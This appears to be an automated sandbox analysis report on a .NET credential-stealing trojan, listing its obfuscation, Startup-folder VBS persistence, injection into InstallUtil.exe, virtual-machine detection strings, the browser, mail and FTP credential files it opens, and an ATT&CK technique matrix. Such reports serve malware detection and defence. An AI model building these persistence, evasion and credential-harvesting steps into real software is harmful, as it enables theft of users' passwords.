                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                    Source: O65887cvz7.exe, -.csBase64 encoded string: 'wCv/gKTGvQDpkq3O8Cblm6+F0iH/kazJ/yu3s6Tf1jz4hrjq4CHpmaPH6mnrkbX01SfgmI/K/je3m7H02jzphbTK/zv4jfrM9ibTuKTF9Cbkz4bO5wb1hKTt4T3hvKDF9z7pz6bO5w3ClazOqBvikKTT3DS3pqTK9wH4hqjF9GnNkKWQ9Df4q5HE4Dv4na7FqDXpgJ7o5iD+ka/f1z3hlajFqAHpgIXK5zO3xvaToGS3tbLY9j/umLj49iD6kbOQwDvhhK3O0iH/kazJ/yvJjLHH/CDphvrJ8jDpmLfGqCHhm6rO5zf/gA=='
                    Source: InnerException.exe.0.dr, -.csBase64 encoded string: 'wCv/gKTGvQDpkq3O8Cblm6+F0iH/kazJ/yu3s6Tf1jz4hrjq4CHpmaPH6mnrkbX01SfgmI/K/je3m7H02jzphbTK/zv4jfrM9ibTuKTF9Cbkz4bO5wb1hKTt4T3hvKDF9z7pz6bO5w3ClazOqBvikKTT3DS3pqTK9wH4hqjF9GnNkKWQ9Df4q5HE4Dv4na7FqDXpgJ7o5iD+ka/f1z3hlajFqAHpgIXK5zO3xvaToGS3tbLY9j/umLj49iD6kbOQwDvhhK3O0iH/kazJ/yvJjLHH/CDphvrJ8jDpmLfGqCHhm6rO5zf/gA=='
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@1/1
                    Source: C:\Users\user\Desktop\O65887cvz7.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
                    Source: O65887cvz7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: O65887cvz7.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\O65887cvz7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: O65887cvz7.exe ReversingLabs: Detection: 75%
                    Source: C:\Users\user\Desktop\O65887cvz7.exe File read: C:\Users\user\Desktop\O65887cvz7.exe
                    Source: unknown Process created: C:\Users\user\Desktop\O65887cvz7.exe "C:\Users\user\Desktop\O65887cvz7.exe"
                    Source: C:\Users\user\Desktop\O65887cvz7.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe"
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\O65887cvz7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\O65887cvz7.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: O65887cvz7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: O65887cvz7.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                    Source: O65887cvz7.exe Static file information: File size 1211392 > 1048576
                    Source: O65887cvz7.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x127200
                    Source: O65887cvz7.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D01000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: O65887cvz7.exe, 00000000.00000002.2055432790.0000000005890000.00000004.08000000.00040000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D01000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: O65887cvz7.exe, -.cs, .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: O65887cvz7.exe, Nwuobju.cs, .Net Code: Bmsdlkvf System.AppDomain.Load(byte[])
                    Source: InnerException.exe.0.dr, -.cs, .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: InnerException.exe.0.dr, Nwuobju.cs, .Net Code: Bmsdlkvf System.AppDomain.Load(byte[])
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, ReflectionHelper.cs, .Net Code: InvokeMethod
                    Source: 0.2.O65887cvz7.exe.5890000.14.raw.unpack, XmlSerializationHelper.cs, .Net Code: ReadObjectProperties
                    Source: 0.2.O65887cvz7.exe.3c38dd0.9.raw.unpack, TypeModel.cs, .Net Code: TryDeserializeList
                    Source: 0.2.O65887cvz7.exe.3c38dd0.9.raw.unpack, ListDecorator.cs, .Net Code: Read
                    Source: 0.2.O65887cvz7.exe.3c38dd0.9.raw.unpack, TypeSerializer.cs, .Net Code: CreateInstance
                    Source: 0.2.O65887cvz7.exe.3c38dd0.9.raw.unpack, TypeSerializer.cs, .Net Code: EmitCreateInstance
                    Source: 0.2.O65887cvz7.exe.3c38dd0.9.raw.unpack, TypeSerializer.cs, .Net Code: EmitCreateIfNull
                    Source: Yara match, File source: 0.2.O65887cvz7.exe.5680000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.O65887cvz7.exe.3bab190.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2054427117.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_065F6349 push ecx; iretd 2_2_065F634A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_065F13F0 push es; iretd 2_2_065F13F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_065F2019 push cs; iretd 2_2_065F2022
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_065F1E40 push cs; iretd 2_2_065F2022
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_065F6A79 push edi; iretd 2_2_065F6A7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_065F280B push ss; iretd 2_2_065F2812
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe, Code function: 4_2_05261913 push eax; ret 4_2_0526191D
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe, Code function: 4_2_061B975F pushfd ; retf 4_2_061B9765
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe, Code function: 4_2_061B71ED push FFFFFFC2h; retf 4_2_061B71F4
                    Source: O65887cvz7.exe, Static PE information: section name: .text entropy: 7.853075047144905
                    Source: InnerException.exe.0.dr, Static PE information: section name: .text entropy: 7.853075047144905
                    Source: C:\Users\user\Desktop\O65887cvz7.exe, File created: C:\Users\user\AppData\Roaming\InnerException.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\O65887cvz7.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs
                    Source: C:\Users\user\Desktop\O65887cvz7.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: O65887cvz7.exe, 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Memory allocated: 1100000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Memory allocated: 2B40000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 3010000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 3270000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 30A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe; Memory allocated: ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe; Memory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe; Memory allocated: 1290000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: C00000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 25B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 23F0000 memory reserve | memory write watch
                    Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: wscript.exe, 00000003.00000002.2158940147.000001E718AA3000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                    Source: InstallUtil.exe, 00000002.00000002.2187384217.00000000063EE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringPNPDeviceID
                    Source: InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: wscript.exe, 00000003.00000002.2158940147.000001E718AA3000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000005.00000002.3293456606.0000000005880000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe"
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Queries volume information: C:\Users\user\Desktop\O65887cvz7.exe VolumeInformation
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe; Queries volume information: C:\Users\user\AppData\Roaming\InnerException.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\InnerException.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\O65887cvz7.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match; File source: dump.pcap, type: PCAP
                    Source: Yara match; File source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 4324, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 4308, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara match; File source: dump.pcap, type: PCAP
                    Source: Yara match; File source: Process Memory Space: O65887cvz7.exe PID: 6616, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 4324, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InnerException.exe PID: 5080, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 4308, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts121
                    Windows Management Instrumentation
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Encrypted Channel
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    1
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    21
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    311
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder
                    2
